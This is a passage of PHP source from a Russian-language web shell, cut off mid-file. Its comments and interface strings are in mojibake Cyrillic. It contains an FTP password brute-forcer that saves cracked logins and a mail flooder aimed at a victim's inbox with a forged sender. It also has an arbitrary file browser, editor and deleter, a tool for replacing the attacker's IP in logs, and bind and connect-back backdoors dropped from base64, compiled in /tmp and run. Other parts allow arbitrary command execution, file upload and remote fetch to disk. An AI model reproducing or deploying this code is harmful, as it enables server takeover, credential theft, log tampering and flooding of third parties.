$text=fgets($open_ftp,4096);
|
|
if(preg_match("/230/",$text)){
|
|
$stop=true;
|
|
$f=@fopen($host._ftp,"a+");
|
|
fputs($f,"Enter on ftp:\nFTPhosting:\t$host\nLogin:\t$login\nPassword:\t$password\n ");
|
|
|
|
echo "
|
|
<TABLE CELLPADDING=0 CELLSPACING=0 width=500 align=center>
|
|
<tr><td align=center class=pagetitle><b><font color=\"blue\">Ïîçäðàâëÿþ!!! Ïàðîëü ïîäîáðàí.</font></b><br>
|
|
Êîííåêò: <b>$host</b><br> Ëîãèí: <b>$login</b><br> Ïàðîëü: <b>$password</b></td></tr></table>
|
|
";exit;
|
|
}
|
|
elseif(preg_match("/530/",$text)){
|
|
$stop=true;
|
|
|
|
}
|
|
}
|
|
fclose($open_ftp);
|
|
}else{
|
|
echo "
|
|
<TABLE CELLPADDING=0 CELLSPACING=0 width=500 align=center>
|
|
<tr><td align=center class=pagetitle bgcolor=#FF0000><b>Íåâåðíî óêàçàí ftp õîñòèíãà!!! Íà <b><u>$host</u></b> çàêðûò 21 ïîðò!</b></b></td></tr>
|
|
</table>
|
|
";exit;
|
|
}
|
|
}
|
|
}
|
|
}
|
|
|
|
|
|
break;
|
|
// SQL Attack
|
|
case "sql":
|
|
|
|
break;
|
|
|
|
|
|
|
|
|
|
|
|
|
|
// MailFlud
|
|
case "mailfluder":
|
|
|
|
$email=$_POST['email']; // Ìûëî æåðòâû
|
|
$from=$_POST['from']; // Ìûëî æåðòâû
|
|
$num=$_POST['num']; // ×èñëî ïèñåì
|
|
$text=$_POST['text']; // Òåêñò ôëóäà
|
|
$kb=$_POST['kb']; // Âåñ ïèñüìà (kb)
|
|
?>
|
|
<script language="JavaScript"><!--
|
|
function reset_form() {
|
|
document.forms[0].elements[0].value="";
|
|
document.forms[0].elements[1].value="";
|
|
document.forms[0].elements[2].value="";
|
|
document.forms[0].elements[3].value="";
|
|
document.forms[0].elements[4].value="";
|
|
}
|
|
//--></script>
|
|
<?php
|
|
if (($email!="" and isset($email)) and ($num!="" and isset($num)) and ($text!="" and isset($text)) and ($kb!="" and isset($kb))) {
|
|
|
|
$num_text=strlen($text)+1; // Îïðåäåëÿåò äëèíó òåêñòà + 1 (ïðîáåë â êîíöå)
|
|
$num_kb=(1024/$num_text)*$kb;
|
|
$num_kb=ceil($num_kb);
|
|
|
|
for ($i=1; $i<=$num_kb; $i++) {
|
|
$msg=$msg.$text." ";
|
|
}
|
|
|
|
for ($i=1; $i<=$num; $i++) {
|
|
mail($email, $text, $msg, "From: $from");
|
|
}
|
|
|
|
$all_kb=$num*$kb;
|
|
|
|
echo <<<EOF
|
|
<p align="center">Æåðòâà: <b>$email</b><br>
|
|
Êîë-âî ïèñåì: <b>$num</b><br>
|
|
Îáùèé ïîñëàííûé îáúåì: <b>$all_kb kb</b><br></p>
|
|
EOF;
|
|
|
|
}
|
|
|
|
else {
|
|
|
|
echo <<<EOF
|
|
<form action="?ac=mailfluder" method="post">
|
|
<table align="center" border="0" bordercolor="#000000">
|
|
<tr><td>Ìûëî æåðòâû</td><td><input type="text" name="email" value="to@mail.com" size="25"></td></tr>
|
|
<tr><td>Îò ëèïîâîãî ìûëà</td><td><input type="text" name="from" value="support@mail.com" size="25"></td></tr>
|
|
<tr><td>×èñëî ïèñåì</td><td><input type="text" name="num" value="5" size="25"></td></tr>
|
|
<tr><td>Òåêñò ôëóäà</td><td><input type="text" name="text" value="fack fack fack" size="25"></td></tr>
|
|
<tr><td>Âåñ ïèñüìà (KB)</td><td><input type="text" name="kb" value="10" size="25"></td></tr>
|
|
<tr><td colspan="2" align="center"><input type="submit"> <input type="button" onclick="reset_form()" value="Reset"></td></tr>
|
|
</table>
|
|
</form>
|
|
EOF;
|
|
|
|
}
|
|
break;
|
|
|
|
case "tar":
|
|
# àðõèâàöèÿ äèðåêòîðèè
|
|
$fullpath = $d."/".$tar;
|
|
/* çàäàåì ñëó÷àéíûå èìåíà ôàéëîâ àðõèâàöèè*/
|
|
$CHARS = "abcdefghijklmnopqrstuvwxyz";
|
|
for ($i=0; $i<6; $i++) $charsname .= $CHARS[rand(0,strlen($CHARS)-1)];
|
|
echo "<br>
|
|
Êàòàëîã <u><b>$fullpath</b></u> ".exec("tar -zc $fullpath -f $charsname.tar.gz")."óïàêîâàí â ôàéë <u>$charsname.tar.gz</u>";
|
|
|
|
|
|
|
|
echo "
|
|
|
|
<form action='?ac=tar' method='post'>
|
|
<tr><td align=center colspan=2 class=pagetitle><b>Àðõèâàöèÿ <u>$name.tar.gz</u>:</b></td></tr>
|
|
<tr>
|
|
<td valign=top><input type=text name=archive size=90 class='inputbox'value='tar -zc /home/$name$http_public -f $name.tar.gz' ></td>
|
|
<td valign=top><input type=submit value='Íà÷àòü'></td>
|
|
</tr></form>";
|
|
|
|
exec($archive);
|
|
|
|
break;
|
|
|
|
|
|
// Íàâèãàöèÿ
|
|
case "navigation":
|
|
|
|
// Ïîøëà íàâèãàöèÿ
|
|
$mymenu = " [<a href='$php_self?ac=navigation&d=$d&e=$e'>Ïðîñìîòð </a>] [<a href='$php_self?ac=navigation&d=$d&e=$e&delete=1'>Óäàëèòü</a>] [<a href='$php_self?ac=navigation&d=$d&ef=$e&edit=1'>Ðåäàêòèðîâàòü</a>] [<a href='$php_self?ac=navigation&d=$d&e=$e&clean=1'>Î÷èñòèòü</a>] [<a href='$php_self?ac=navigation&d=$d&e=$e&replace=1'>Çàìåíèòü òåêñò</a>] [<a href='$php_self?ac=navigation&d=$d&download=$e'>Çàãðóçèòü</a>]<br>";
|
|
if(@$_GET['download']){
|
|
@$download=$_GET['download'];
|
|
@$d=$_GET['d'];
|
|
header("Content-disposition: attachment; filename=\"$download\";");
|
|
readfile("$d/$download");
|
|
exit;}
|
|
$images=array(".gif",".jpg",".png",".bmp",".jpeg");
|
|
$whereme=getcwd();
|
|
@$d=@$_GET['d'];
|
|
$copyr = "<center>";
|
|
$php_self=@$_SERVER['PHP_SELF'];
|
|
if(@eregi("/",$whereme)){$os="unix";}else{$os="win";}
|
|
if(!isset($d)){$d=$whereme;}
|
|
$d=str_replace("\\","/",$d);
|
|
|
|
|
|
|
|
$expl=explode("/",$d);
|
|
$coun=count($expl);
|
|
if($os=="unix"){echo "<a href='$php_self?ac=navigation&d=/'>/</a>";}
|
|
else{
|
|
echo "<a href='$php_self?ac=navigation&d=$expl[0]'>$expl[0]/</a>";}
|
|
for($i=1; $i<$coun; $i++){
|
|
@$xx.=$expl[$i]."/";
|
|
$sls="<a href='$php_self?ac=navigation&d=$expl[0]/$xx'>$expl[$i]</a>/";
|
|
$sls=str_replace("//","/",$sls);
|
|
$sls=str_replace("/'></a>/","/'></a>",$sls);
|
|
print $sls;
|
|
}
|
|
echo "</td></tr>";
|
|
//if($os=="unix"){ echo "
|
|
//<tr><td><b>id:</b> ".@exec('id')."</td></tr>
|
|
//<tr><td><b>uname -a:</b> ".@exec('uname -a')."</td></tr>";}
|
|
if(@$_GET['delfl']){
|
|
@$delfolder=$_GET['delfolder'];
|
|
echo "DELETE FOLDER: <font color=red>".@$_GET['delfolder']."</font><br>
|
|
(All files must be writable)<br>
|
|
<a href='$php_self?deldir=1&dir=".@$delfolder."&rback=".@$_GET['rback']."'>Yes</a> || <a href='$php_self?ac=navigation&d=$d'>No</a><br><br>
|
|
";
|
|
exit;
|
|
}
|
|
if(@$_GET['deldir']){
|
|
@$dir=$_GET['dir'];
|
|
function deldir($dir)
|
|
{
|
|
$handle = @opendir($dir);
|
|
while (false!==($ff = @readdir($handle))){
|
|
if($ff != "." && $ff != ".."){
|
|
if(@is_dir("$dir/$ff")){
|
|
deldir("$dir/$ff");
|
|
}else{
|
|
@unlink("$dir/$ff");
|
|
}}}
|
|
@closedir($handle);
|
|
if(@rmdir($dir)){
|
|
@$success = true;}
|
|
return @$success;
|
|
}
|
|
$dir=@$dir;
|
|
deldir($dir);
|
|
|
|
$rback=$_GET['rback'];
|
|
@$rback=explode("/",$rback);
|
|
$crb=count($rback);
|
|
for($i=0; $i<$crb-1; $i++){
|
|
@$x.=$rback[$i]."/";
|
|
}
|
|
echo "<meta http-equiv=\"REFRESH\" content=\"0;URL='$php_self?ac=navigation&d=".@$x."'\">";
|
|
echo $copyr;
|
|
exit;}
|
|
if(@$_GET['replace']=="1"){
|
|
$ip=@$_SERVER['REMOTE_ADDR'];
|
|
$d=$_GET['d'];
|
|
$e=$_GET['e'];
|
|
@$de=$d."/".$e;
|
|
$de=str_replace("//","/",$de);
|
|
$e=@$e;
|
|
echo $mymenu ;
|
|
echo "
|
|
Ñðåäñòâî çàìåíû:<br>
|
|
(òû ìîæåøü çàìåíèòü ëþáîé òåêñò)<br>
|
|
Ôàéë: $de<br>
|
|
<form method=post>
|
|
1. Òâîé IP<br>
|
|
2. IP microsoft.com :)<br>
|
|
Çàìåíÿòü ýòî <input name=this size=30 value=$ip> ýòèì <input name=bythis size=30 value=207.46.245.156>
|
|
<input type=submit name=doit value=Çàìåíèòü>
|
|
</form>
|
|
";
|
|
|
|
if(@$_POST['doit']){
|
|
|
|
$filename="$d/$e";
|
|
$fd = @fopen ($filename, "r");
|
|
$rpl = @fread ($fd, @filesize ($filename));
|
|
$re=str_replace("$this","$bythis",$rpl);
|
|
$x=@fopen("$d/$e","w");
|
|
@fwrite($x,"$re");
|
|
echo "<br><center>$this çàìåíåíî íà $bythis<br>
|
|
[<a href='$php_self?ac=navigation&d=$d&e=$e'>Ïîñìîòðåòü ôàéë</a>]<br><br><Br>";
|
|
|
|
}
|
|
echo $copyr;
|
|
exit;}
|
|
|
|
|
|
|
|
|
|
if(@$_GET['yes']=="yes"){
|
|
$d=@$_GET['d']; $e=@$_GET['e'];
|
|
unlink($d."/".$e);
|
|
$delresult="$d/$e óäàëåí! <meta http-equiv=\"REFRESH\" content=\"2;URL=$php_self?ac=navigation&d=$d\">";
|
|
}
|
|
if(@$_GET['clean']=="1"){
|
|
@$e=$_GET['e'];
|
|
$x=fopen("$d/$e","w");
|
|
fwrite($x,"");
|
|
echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?ac=navigation&d=$d&e=".@$e."\">";
|
|
exit;
|
|
}
|
|
|
|
|
|
if(@$_GET['e']){
|
|
$d=@$_GET['d'];
|
|
$e=@$_GET['e'];
|
|
$pinf=pathinfo($e);
|
|
if(in_array(".".@$pinf['extension'],$images)){
|
|
echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?ac=navigation&d=$d&e=$e&img=1\">";
|
|
exit;}
|
|
$filename="$d/$e";
|
|
$fd = @fopen ($filename, "r");
|
|
$c = @fread ($fd, @filesize ($filename));
|
|
$c=htmlspecialchars($c);
|
|
$de=$d."/".$e;
|
|
$de=str_replace("//","/",$de);
|
|
if(is_file($de)){
|
|
if(!is_writable($de)){echo "<font color=red><br><b>ÒÎËÜÊÎ ×ÒÅÍÈÅ</b></font><br>";}}
|
|
echo $mymenu ;
|
|
echo "
|
|
Ñîäåðæèìîå ôàéëà:<br>
|
|
$de
|
|
<br>
|
|
<table width=100% border=1 cellpadding=0 cellspacing=0>
|
|
<tr><td><pre>
|
|
$c
|
|
|
|
</pre></td></tr>
|
|
</table>";
|
|
if(@$_GET['delete']=="1"){
|
|
$delete=$_GET['delete'];
|
|
echo "
|
|
Óäàëåíèå: òû óâåðåí?<br>
|
|
<a href=\"$php_self?ac=navigation&d=$d&e=$e&delete=".@$delete."&yes=yes\">Äà</a> || <a href='$php_self?no=1'>Íåò</a>
|
|
<br>
|
|
";
|
|
if(@$_GET['yes']=="yes"){
|
|
@$d=$_GET['d']; @$e=$_GET['e'];
|
|
echo $delresult;
|
|
}
|
|
if(@$_GET['no']){
|
|
echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?ac=navigation&d=$d&e=$e\">
|
|
";
|
|
}
|
|
|
|
|
|
} #end of delete
|
|
echo $copyr;
|
|
exit;
|
|
} #end of e
|
|
|
|
if(@$_GET['edit']=="1"){
|
|
@$d=$_GET['d'];
|
|
@$ef=$_GET['ef'];
|
|
if(is_file($d."/".$ef)){
|
|
if(!is_writable($d."/".$ef)){echo "<font color=red><br><b>ÒÎËÜÊÎ ×ÒÅÍÈÅ</b></font><br>";}}
|
|
echo $mymenu ;
|
|
$filename="$d/$ef";
|
|
$fd = @fopen ($filename, "r");
|
|
$c = @fread ($fd, @filesize ($filename));
|
|
$c=htmlspecialchars($c);
|
|
$de=$d."/".$ef;
|
|
$de=str_replace("//","/",$de);
|
|
echo "
|
|
Ðåäàêòèðîâàíèå:<br>
|
|
$de<br>
|
|
<form method=post>
|
|
<input type=HIDDEN name=filename value='$d/$ef'>
|
|
<textarea cols=143 rows=30 name=editf>$c</textarea>
|
|
<br>
|
|
<input type=submit name=save value='Ñîõðàíèòü èçìåíåíèÿ'></form><br>
|
|
|
|
";
|
|
if(@$_POST['save']){
|
|
$editf=@$_POST['editf'];
|
|
$editf=stripslashes($editf);
|
|
$f=fopen($filename,"w+");
|
|
fwrite($f,"$editf");
|
|
echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?ac=navigation&d=$d&e=$ef\">";
|
|
exit;
|
|
}
|
|
echo $copyr;
|
|
exit;
|
|
}
|
|
|
|
|
|
|
|
echo"
|
|
<table width=100% cellpadding=1 cellspacing=0 class=hack>
|
|
<tr><td bgcolor=#4d9ef0><center><b>Íàçâàíèå</b></td><td bgcolor=#4d9ef0><center><b>Òèï</b></td><td bgcolor=#4d9ef0><b>Ðàçìåð</b></td><td bgcolor=#4d9ef0><center><b>Âëàäåëåö/Ãðóïïà</b></td><td bgcolor=#4d9ef0><b>Ïðàâà</b></td></tr>
|
|
";
|
|
$dirs=array();
|
|
$files=array();
|
|
$dh = @opendir($d) or die("<table width=100%><tr><td><center>Êàòàëîã íå ñóùåñòâóåò èëè äîñòóï ê íåìó çàïðåùåí!</center><br>$copyr</td></tr></table>");
|
|
while (!(($file = readdir($dh)) === false)) {
|
|
if ($file=="." || $file=="..") continue;
|
|
if (@is_dir("$d/$file")) {
|
|
$dirs[]=$file;
|
|
}else{
|
|
$files[]=$file;
|
|
}
|
|
sort($dirs);
|
|
sort($files);
|
|
|
|
$fz=@filesize("$d/$file");
|
|
}
|
|
|
|
function perm($perms){
|
|
if (($perms & 0xC000) == 0xC000) {
|
|
$info = 's';
|
|
} elseif (($perms & 0xA000) == 0xA000) {
|
|
$info = 'l';
|
|
} elseif (($perms & 0x8000) == 0x8000) {
|
|
$info = '-';
|
|
} elseif (($perms & 0x6000) == 0x6000) {
|
|
$info = 'b';
|
|
} elseif (($perms & 0x4000) == 0x4000) {
|
|
$info = 'd';
|
|
} elseif (($perms & 0x2000) == 0x2000) {
|
|
$info = 'c';
|
|
} elseif (($perms & 0x1000) == 0x1000) {
|
|
$info = 'p';
|
|
} else {
|
|
$info = 'u';
|
|
}
|
|
$info .= (($perms & 0x0100) ? 'r' : '-');
|
|
$info .= (($perms & 0x0080) ? 'w' : '-');
|
|
$info .= (($perms & 0x0040) ?
|
|
(($perms & 0x0800) ? 's' : 'x' ) :
|
|
(($perms & 0x0800) ? 'S' : '-'));
|
|
$info .= (($perms & 0x0020) ? 'r' : '-');
|
|
$info .= (($perms & 0x0010) ? 'w' : '-');
|
|
$info .= (($perms & 0x0008) ?
|
|
(($perms & 0x0400) ? 's' : 'x' ) :
|
|
(($perms & 0x0400) ? 'S' : '-'));
|
|
$info .= (($perms & 0x0004) ? 'r' : '-');
|
|
$info .= (($perms & 0x0002) ? 'w' : '-');
|
|
$info .= (($perms & 0x0001) ?
|
|
(($perms & 0x0200) ? 't' : 'x' ) :
|
|
(($perms & 0x0200) ? 'T' : '-'));
|
|
return $info;
|
|
}
|
|
|
|
|
|
for($i=0; $i<count($dirs); $i++){
|
|
if(is_writable($dirs[$i])){$info="<font color=green><li> W</font>";}
|
|
else{$info="<font color=red><li> R</font>";}
|
|
$perms = @fileperms($d."/".$dirs[$i]);
|
|
$owner = @fileowner($d."/".$dirs[$i]);
|
|
if($os=="unix"){
|
|
$fileownera=posix_getpwuid($owner);
|
|
$owner=$fileownera['name'];
|
|
}
|
|
$group = @filegroup($d."/".$dirs[$i]);
|
|
if($os=="unix"){
|
|
$groupinfo = posix_getgrgid($group);
|
|
$group=$groupinfo['name'];
|
|
}
|
|
$info=perm($perms);
|
|
if($i%2){$color="#aed7ff";}else{$color="#68adf2";}
|
|
$linkd="<a href='$php_self?ac=navigation&d=$d/$dirs[$i]'>$dirs[$i]</a>";
|
|
$linkd=str_replace("//","/",$linkd);
|
|
echo "<tr><td bgcolor=$color><font face=wingdings size=2>0</font> $linkd</td><td bgcolor=$color><center><font color=blue>DIR</font></td><td bgcolor=$color> </td><td bgcolor=$color><center>$owner/$group</td><td bgcolor=$color>$info</td></tr>";
|
|
}
|
|
|
|
for($i=0; $i<count($files); $i++){
|
|
if(is_writable($files[$i])){$info="<font color=green><li> W</font>";}
|
|
else{$info="<font color=red><li> R</font>";}
|
|
$size=@filesize($d."/".$files[$i]);
|
|
$perms = @fileperms($d."/".$files[$i]);
|
|
$owner = @fileowner($d."/".$files[$i]);
|
|
if($os=="unix"){
|
|
$fileownera=posix_getpwuid($owner);
|
|
$owner=$fileownera['name'];
|
|
}
|
|
$group = @filegroup($d."/".$files[$i]);
|
|
if($os=="unix"){
|
|
$groupinfo = posix_getgrgid($group);
|
|
$group=$groupinfo['name'];
|
|
}
|
|
$info=perm($perms);
|
|
if($i%2){$color="#ccccff";}else{$color="#b0b0ff";}
|
|
|
|
if ($size < 1024){$siz=$size.' b';
|
|
}else{
|
|
if ($size < 1024*1024){$siz=number_format(($size/1024), 2, '.', '').' kb';}else{
|
|
if ($size < 1000000000){$siz=number_format($size/(1024*1024), 2, '.', '').' mb';}else{
|
|
if ($size < 1000000000000){$siz=number_format($size/(1024*1024*1024), 2, '.', '').' gb';}
|
|
}}}
|
|
echo "<tr><td bgcolor=$color><font face=wingdings size=3>2</font> <a href='$php_self?ac=navigation&d=$d&e=$files[$i]'>$files[$i]</a></td><td bgcolor=$color><center><a href='$php_self?ac=navigation&d=$d&download=$files[$i]' title='Download $files[$i]'><font size=2 face=Webdings color=green>`</font></a></td><td bgcolor=$color>$siz</td><td bgcolor=$color><center>$owner/$group</td><td bgcolor=$color>$info</td></tr>";
|
|
}
|
|
|
|
echo "</table></td></tr></table>";
|
|
echo $copyr;
|
|
break;
|
|
|
|
// Óñòàíîâêà áåêäîðà
|
|
case "backconnect":
|
|
echo "<b>Óñòàíîâêà áåêäîðà / îòêðûòèå ïîðòà</b>";
|
|
echo "<form name=bind method=POST>";
|
|
echo "<font face=Verdana size=-2>";
|
|
echo "<b>Îòêðûòü ïîðò </b>";
|
|
echo "<input type=text name=port size=15 value=11457> ";
|
|
echo "<b>Ïàðîëü äëÿ äîñòóïà </b>";
|
|
echo "<input type=text name=bind_pass size=15 value=nrws> ";
|
|
echo "<b>Èñïîëüçîâàòü </b>";
|
|
echo "<select size=\"1\" name=\"use\">";
|
|
echo "<option value=\"Perl\">Perl</option>";
|
|
echo "<option value=\"C\">C</option>";
|
|
echo "</select> ";
|
|
echo "<input type=hidden name=dir value=".$dir.">";
|
|
echo "<input type=submit name=submit value=Îòêðûòü>";
|
|
echo "</font>";
|
|
echo "</form>";
|
|
|
|
echo "<b>Óñòàíîâêà áåêäîðà / connect-back</b>";
|
|
echo "<form name=back method=POST>";
|
|
echo "<font face=Verdana size=-2>";
|
|
echo "<b>IP-àäðåñ </b>";
|
|
echo "<input type=text name=ip size=15 value=127.0.0.1> ";
|
|
echo "<b>Ïîðò </b>";
|
|
echo "<input type=text name=port size=15 value=31337> ";
|
|
echo "<b>Èñïîëüçîâàòü </b>";
|
|
echo "<select size=\"1\" name=\"use\">";
|
|
echo "<option value=\"Perl\">Perl</option>";
|
|
echo "<option value=\"C\">C</option>";
|
|
echo "</select> ";
|
|
echo "<input type=hidden name=dir value=".$dir.">";
|
|
echo "<input type=submit name=submit value=Âûïîëíèòü>";
|
|
echo "</font>";
|
|
echo "</form>";
|
|
|
|
|
|
/* port bind C */
|
|
if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C"))
|
|
{
|
|
$w_file=fopen("/tmp/bd.c","ab+") or $err=1;
|
|
if($err==1)
|
|
{
|
|
echo "<font color=red face=Fixedsys><div align=center>ÎØÈÁÊÀ! Íåâîçìîæíà çàïèñü â /tmp/bd.c</div></font>";
|
|
$err=0;
|
|
}
|
|
else
|
|
{
|
|
fputs($w_file,base64_decode($port_bind_bd_c));
|
|
fclose($w_file);
|
|
$blah=exec("gcc -o /tmp/bd /tmp/bd.c");
|
|
unlink("/tmp/bd.c");
|
|
$bind_string="/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &";
|
|
$blah=exec($bind_string);
|
|
$_POST['cmd']="ps -aux | grep bd";
|
|
$err=0;
|
|
}
|
|
}
|
|
|
|
/* port bind Perl */
|
|
if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl"))
|
|
{
|
|
$w_file=fopen("/tmp/bdpl","ab+") or $err=1;
|
|
if($err==1)
|
|
{
|
|
echo "<font color=red face=Fixedsys><div align=center>ÎØÈÁÊÀ! Íåâîçìîæíà çàïèñü â /tmp/</div></font>";
|
|
$err=0;
|
|
}
|
|
else
|
|
{
|
|
fputs($w_file,base64_decode($port_bind_bd_pl));
|
|
fclose($w_file);
|
|
$bind_string="perl /tmp/bdpl ".$_POST['port']." &";
|
|
$blah=exec($bind_string);
|
|
$_POST['cmd']="ps -aux | grep bdpl";
|
|
$err=0;
|
|
}
|
|
}
|
|
|
|
/* back connect Perl */
|
|
if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl"))
|
|
{
|
|
$w_file=fopen("/tmp/back","ab+") or $err=1;
|
|
if($err==1)
|
|
{
|
|
echo "<font color=red face=Fixedsys><div align=center>ÎØÈÁÊÀ! Íåâîçìîæíà çàïèñü â /tmp/</div></font>";
|
|
$err=0;
|
|
}
|
|
else
|
|
{
|
|
fputs($w_file,base64_decode($back_connect));
|
|
fclose($w_file);
|
|
$bc_string="perl /tmp/back ".$_POST['ip']." ".$_POST['port']." &";
|
|
$blah=exec($bc_string);
|
|
$_POST['cmd']="echo \"Ñåé÷àñ ñêðèïò êîííåêòèòñÿ ê ".$_POST['ip']." port ".$_POST['port']." ...\"";
|
|
$err=0;
|
|
}
|
|
}
|
|
|
|
/* back connect C */
|
|
if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C"))
|
|
{
|
|
$w_file=fopen("/tmp/back.c","ab+") or $err=1;
|
|
if($err==1)
|
|
{
|
|
echo "<font color=red face=Fixedsys><div align=center>ÎØÈÁÊÀ! Íåâîçìîæíà çàïèñü â /tmp/back.c</div></font>";
|
|
$err=0;
|
|
}
|
|
else
|
|
{
|
|
fputs($w_file,base64_decode($back_connect_c));
|
|
fclose($w_file);
|
|
$blah=exec("gcc -o /tmp/backc /tmp/back.c");
|
|
unlink("/tmp/back.c");
|
|
$bc_string="/tmp/backc ".$_POST['ip']." ".$_POST['port']." &";
|
|
$blah=exec($bc_string);
|
|
$_POST['cmd']="echo \"Ñåé÷àñ ñêðèïò êîííåêòèòñÿ ê ".$_POST['ip']." port ".$_POST['port']." ...\"";
|
|
$err=0;
|
|
}
|
|
}
|
|
echo "<font face=Verdana size=-2>Âûïîëíåííàÿ êîìàíäà: <b>".$_POST['cmd']."</b></font></td></tr><tr><td>";
|
|
echo "<b>";
|
|
echo "<br>Ðåçóëüòàò: ";
|
|
echo "<font color=red size=2";
|
|
print "".passthru($_POST['cmd'])."";
|
|
echo "</font></b>";
|
|
break;
|
|
|
|
// Uploading
|
|
case "upload":
|
|
|
|
echo <<<HTML
|
|
<b>Çàãðóçêà ôàéëîâ</b>
|
|
<a href='$php_self?ac=massupload&d=$d&t=massupload'>* Çàãðóçèòü áîëüøîå êîëè÷åñòâî ôàéëîâ *</a><br><br>
|
|
<table>
|
|
<form enctype="multipart/form-data" action="$self" method="POST">
|
|
<input type="hidden" name="ac" value="upload">
|
|
<tr>
|
|
<td>Ôàéë:</td>
|
|
<td><input size="48" name="file" type="file"></td>
|
|
</tr>
|
|
<tr>
|
|
<td>Ïàïêà:</td>
|
|
<td><input size="48" value="$docr/" name="path" type="text"><input type="submit" value="Ïîñëàòü"></td><br>
|
|
$tend
|
|
HTML;
|
|
|
|
if (isset($_POST['path'])){
|
|
|
|
$uploadfile = $_POST['path'].$_FILES['file']['name'];
|
|
if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];}
|
|
|
|
if (copy($_FILES['file']['tmp_name'], $uploadfile)) {
|
|
echo "Ôàéë óñïåøíî çàãðóæåí â ïàïêó $uploadfile\n";
|
|
echo "Èìÿ:" .$_FILES['file']['name']. "\n";
|
|
echo "Ðàçìåð:" .$_FILES['file']['size']. "\n";
|
|
|
|
} else {
|
|
print "Íå óäà¸òñÿ çàãðóçèòü ôàéë. Info:\n";
|
|
print_r($_FILES);
|
|
}
|
|
}
|
|
|
|
|
|
echo "<form enctype='multipart/form-data' action='?ac=upload&status=ok' method=post>
|
|
<b>Çàãðóçêà ôàéëîâ ñ óäàëåííîãî êîìïüþòåðà:</b><br>
|
|
HTTP-ïóòü ê ôàéëó: <br>
|
|
<input type='text' name='file3' value='http://' size=40><br>
|
|
Íàçâàíèå ôàéëà èëè ïóòü ñ íàçâàíèåì ôàéëà: <br>
|
|
<input type='text' name='file2' value='$docr/' size=40><br>
|
|
<input type='submit' value='Çàãðóçèòü ôàéë'></form>";
|
|
|
|
|
|
$data = @implode("", file($file3));
|
|
$fp = @fopen($file2, "wb");
|
|
@fputs($fp, $data);
|
|
$ok = @fclose($fp);
|
|
if($ok)
|
|
{
|
|
$size = filesize($file2)/1024;
|
|
$sizef = sprintf("%.2f", $size);
|
|
|
|
print "<br><center>Âû çàãðóçèëè: <b>ôàéë <u>$file2</u> ðàçìåðîì</b> (".$sizef."êÁ) </center>";
|
|
}
|
|
else
|
|
{
|
|
print "<br><center><font color=red size = 2><b>Îøèáêà çàãðóçêè ôàéëà</b></font></center>";
|
|
}
|
|
|
|
|
|
|
|
|
|
break;
|
|
// Tools
|
|
case "tools":
|
|
echo "<form method=post>Ãåíåðàöèÿ md5-øèôðà<br><input name=md5 size=30></form><br>";
|
|
@$md5=@$_POST['md5'];
|
|
if(@$_POST['md5']){ echo "md5 ñãåíåðèðîâàí:<br> ".md5($md5)."";}
|
|
echo "<br>
|
|
<form method=post>Êîäèðîâàíèå/äåêîäèðîâàíèå base64<br><input name=base64 size=30></form><br>";
|
|
if(@$_POST['base64']){
|
|
@$base64=$_POST['base64'];
|
|
echo "
|
|
Êîäèðîâàíî:<br><textarea rows=8 cols=80>".base64_encode($base64)."</textarea><br>
|
|
Äåêîäèðîâàíî: <br><textarea rows=8 cols=80>".base64_decode($base64)."</textarea><br>";}
|
|
echo "<br>
|
|
<form method=post>DES-êîäèðîâàíèå:<br><input name=des size=30></form><br>";
|
|
if(@$_POST['des']){
|
|
@$des=@$_POST['des'];
|
|
echo "DES ñãåíåðèðîâàí: <br>".crypt($des)."";}
|
|
echo "<br>
|
|
<form method=post>SHA1-êîäèðîâàíèå:<br><input name=sha1 size=30></form><br>";
|
|
if(@$_POST['sha1']){
|
|
@$des=@$_POST['sha1'];
|
|
echo "SHA1 ñãåíåðèðîâàí: <br>".sha1($sha1a)."";}
|
|
|
|
echo "<form method=POST>";
|
|
echo "html-êîä -> øåñòíàäöàòèðè÷íûå çíà÷åíèÿ<br><input type=text name=data size=30>";
|
|
|
|
|
|
if (isset($_POST['data']))
|
|
{
|
|
echo "<br><br><b>Ðåçóëüòàò:<br></b>";
|
|
$str=str_replace("%20","",$_POST['data']);
|
|
for($i=0;$i<strlen($str);$i++)
|
|
{
|
|
$hex=dechex(ord($str[$i]));
|
|
if ($str[$i]=='&') echo "$str[$i]";
|
|
else if ($str[$i]!='\\') echo "%$hex";
|
|
}
|
|
}
|
|
exit;
|
|
break;
|
|
// Mass Uploading
|
|
case "massupload":
|
|
|
|
|
|
echo "
|
|
Ìàñîâàÿ çàãðóçêà ôàéëîâ:<br>
|
|
<form enctype=\"multipart/form-data\" method=post>
|
|
<input type=file name=text1 size=43> <input type=file name=text11 size=43><br>
|
|
<input type=file name=text2 size=43> <input type=file name=text12 size=43><br>
|
|
<input type=file name=text3 size=43> <input type=file name=text13 size=43><br>
|
|
<input type=file name=text4 size=43> <input type=file name=text14 size=43><br>
|
|
<input type=file name=text5 size=43> <input type=file name=text15 size=43><br>
|
|
<input type=file name=text6 size=43> <input type=file name=text16 size=43><br>
|
|
<input type=file name=text7 size=43> <input type=file name=text17 size=43><br>
|
|
<input type=file name=text8 size=43> <input type=file name=text18 size=43><br>
|
|
<input type=file name=text9 size=43> <input type=file name=text19 size=43><br>
|
|
<input type=file name=text10 size=43> <input type=file name=text20 size=43><br>
|
|
<input name=where size=43 value='$docr'><br>
|
|
<input type=submit value=Çàãðóçèòü name=massupload>
|
|
</form><br>";
|
|
|
|
if(@$_POST['massupload']){
|
|
$where=@$_POST['where'];
|
|
$uploadfile1 = "$where/".@$_FILES['text1']['name'];
|
|
$uploadfile2 = "$where/".@$_FILES['text2']['name'];
|
|
$uploadfile3 = "$where/".@$_FILES['text3']['name'];
|
|
$uploadfile4 = "$where/".@$_FILES['text4']['name'];
|
|
$uploadfile5 = "$where/".@$_FILES['text5']['name'];
|
|
$uploadfile6 = "$where/".@$_FILES['text6']['name'];
|
|
$uploadfile7 = "$where/".@$_FILES['text7']['name'];
|
|
$uploadfile8 = "$where/".@$_FILES['text8']['name'];
|
|
